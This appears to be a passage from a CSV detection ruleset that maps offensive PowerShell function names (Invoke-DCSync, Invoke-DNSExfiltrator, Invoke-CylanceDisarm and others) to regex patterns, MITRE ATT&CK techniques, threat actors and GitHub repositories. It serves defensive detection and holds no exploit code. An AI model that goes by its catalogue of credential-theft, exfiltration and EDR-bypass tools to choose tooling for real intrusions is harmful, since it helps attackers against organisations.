"*Invoke-CredentialInjection*",".{0,1000}Invoke\-CredentialInjection.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-CredentialInjection.ps1*",".{0,1000}Invoke\-CredentialInjection\.ps1.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-CredentialInjection.ps1*",".{0,1000}Invoke\-CredentialInjection\.ps1.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-CredentialsPhish*",".{0,1000}Invoke\-CredentialsPhish.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-CylanceDisarm -ProcessID * -DisableMemDef*",".{0,1000}Invoke\-CylanceDisarm\s\-ProcessID\s.{0,1000}\s\-DisableMemDef.{0,1000}","offensive_tool_keyword","RandomPS-Scripts","PowerShell wrapper for a Cylance Bypass","T1055 - T1068 - T1562.001","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/xorrior/RandomPS-Scripts","1","0","N/A","8","4","313","89","2017-12-29T17:16:42Z","2015-02-25T04:52:01Z" "*Invoke-DAFT.*",".{0,1000}Invoke\-DAFT\..{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*invoke-daisychain*",".{0,1000}invoke\-daisychain.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Invoke-DCOM.ps1*",".{0,1000}Invoke\-DCOM\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1091","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-DCOM.ps1*",".{0,1000}Invoke\-DCOM\.ps1.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation 
tools","https://github.com/cobbr/SharpSploit","1","1","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*Invoke-DCOMObjectScan.json*",".{0,1000}Invoke\-DCOMObjectScan\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*invoke-dcompayload*",".{0,1000}invoke\-dcompayload.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Invoke-DCOMPowerPointPivot*",".{0,1000}Invoke\-DCOMPowerPointPivot.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*Invoke-DCSync*",".{0,1000}Invoke\-DCSync.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within 
Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*Invoke-DCSync*",".{0,1000}Invoke\-DCSync.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1056","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-DefenderExclusionsCheck*",".{0,1000}Invoke\-DefenderExclusionsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege 
Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-DeleteGroup -Tokens * -groupID *",".{0,1000}Invoke\-DeleteGroup\s\-Tokens\s.{0,1000}\s\-groupID\s.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Invoke-DeleteOAuthApp -Tokens *",".{0,1000}Invoke\-DeleteOAuthApp\s\-Tokens\s.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Invoke-DeleteOAuthApp*",".{0,1000}Invoke\-DeleteOAuthApp.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","Delete an OAuth App","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Invoke-DHCPCheckup*",".{0,1000}Invoke\-DHCPCheckup.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","1","N/A","9","2","105","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z" 
"*Invoke-DinvokeKatz*",".{0,1000}Invoke\-DinvokeKatz.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-DllHijackingCheck*",".{0,1000}Invoke\-DllHijackingCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-DllHijackingCheck*",".{0,1000}Invoke\-DllHijackingCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-DllInjection*",".{0,1000}Invoke\-DllInjection.{0,1000}","offensive_tool_keyword","empire","empire script function. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-DllInjection*",".{0,1000}Invoke\-DllInjection.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-DNSExfiltrator*",".{0,1000}Invoke\-DNSExfiltrator.{0,1000}","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. 
This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","1","N/A","10","9","827","180","2024-04-29T20:20:43Z","2017-12-20T13:58:09Z" "*Invoke-DNSUpdate.ps1*",".{0,1000}Invoke\-DNSUpdate\.ps1.{0,1000}","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","N/A","POST Exploitation tools","https://github.com/Kevin-Robertson/Powermad","1","0","N/A","N/A","10","1123","168","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z" "*Invoke-Dogz.ps1*",".{0,1000}Invoke\-Dogz\.ps1.{0,1000}","offensive_tool_keyword","mimidogz","Rewrite of Invoke-Mimikatz.ps1 to avoid AV detection","T1055 - T1560.001 - T1110.001 - T1003 - T1071","TA0005 - TA0040 - TA0006","N/A","N/A","Credential Access","https://github.com/projectb-temp/mimidogz","1","1","N/A","10","1","0","0","2019-02-11T10:14:10Z","2019-02-11T10:12:08Z" "*Invoke-DomainHarvest*",".{0,1000}Invoke\-DomainHarvest.{0,1000}","offensive_tool_keyword","MailSniper","Invoke-DomainHarvest* will attempt to connect to an * portal and determine a valid domain name for logging into the portal","T1595 T1114 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/dafthack/MailSniper","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*Invoke-DomainHarvestOWA*",".{0,1000}Invoke\-DomainHarvestOWA.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*Invoke-DomainPasswordSpray*",".{0,1000}Invoke\-DomainPasswordSpray.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","1","N/A","10","10","1636","362","2023-09-22T22:13:14Z","2016-10-04T23:37:37Z" "*Invoke-DomainPasswordSpray*",".{0,1000}Invoke\-DomainPasswordSpray.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-DOSfuscation*",".{0,1000}Invoke\-DOSfuscation.{0,1000}","offensive_tool_keyword","Invoke-DOSfuscation","Invoke-DOSfuscation is a PowerShell v2.0+ compatible cmd.exe command obfuscation framework. 
(White paper: https://www.fireeye.com/blog/threat-research/2018/03/dosfuscation-exploring-obfuscation-and-detection-techniques.html)","T1027 - T1140 - T1059","TA0002 - TA0003 - TA0040","N/A","N/A","Defense Evasion","https://github.com/danielbohannon/Invoke-DOSfuscation","1","1","N/A","N/A","8","788","131","2018-03-27T12:16:18Z","2018-03-19T16:47:54Z" "*Invoke-DriveFileDownload*",".{0,1000}Invoke\-DriveFileDownload.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","Has the ability to download single files from SharePoint and OneDrive as the current user","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Invoke-DriveFileDownload*",".{0,1000}Invoke\-DriveFileDownload.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Invoke-DriverCoInstallersCheck*",".{0,1000}Invoke\-DriverCoInstallersCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-DumpApps*",".{0,1000}Invoke\-DumpApps.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","Gets app registrations and external enterprise apps along with 
consent and scope info","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Invoke-DumpCAPS*",".{0,1000}Invoke\-DumpCAPS.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","Gets conditional access policies","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Invoke-DumpOWAMailboxViaMSGraphApi*",".{0,1000}Invoke\-DumpOWAMailboxViaMSGraphApi.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","6","539","85","2023-11-04T19:29:55Z","2021-07-08T02:28:12Z" "*invoke-edrchecker*",".{0,1000}invoke\-edrchecker.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Invoke-EDRChecker*",".{0,1000}Invoke\-EDRChecker.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - 
TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","1","N/A","8","7","656","94","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z" "*Invoke-EDRChecker.ps1*",".{0,1000}Invoke\-EDRChecker\.ps1.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*Invoke-EgressCheck*",".{0,1000}Invoke\-EgressCheck.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-EgressCheck.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-EgressCheck.ps1*",".{0,1000}Invoke\-EgressCheck\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1141","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-Empire *",".{0,1000}Invoke\-Empire\s.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - 
T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*Invoke-Empire*",".{0,1000}Invoke\-Empire.{0,1000}","offensive_tool_keyword","empire","empire function name of agent.ps1. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
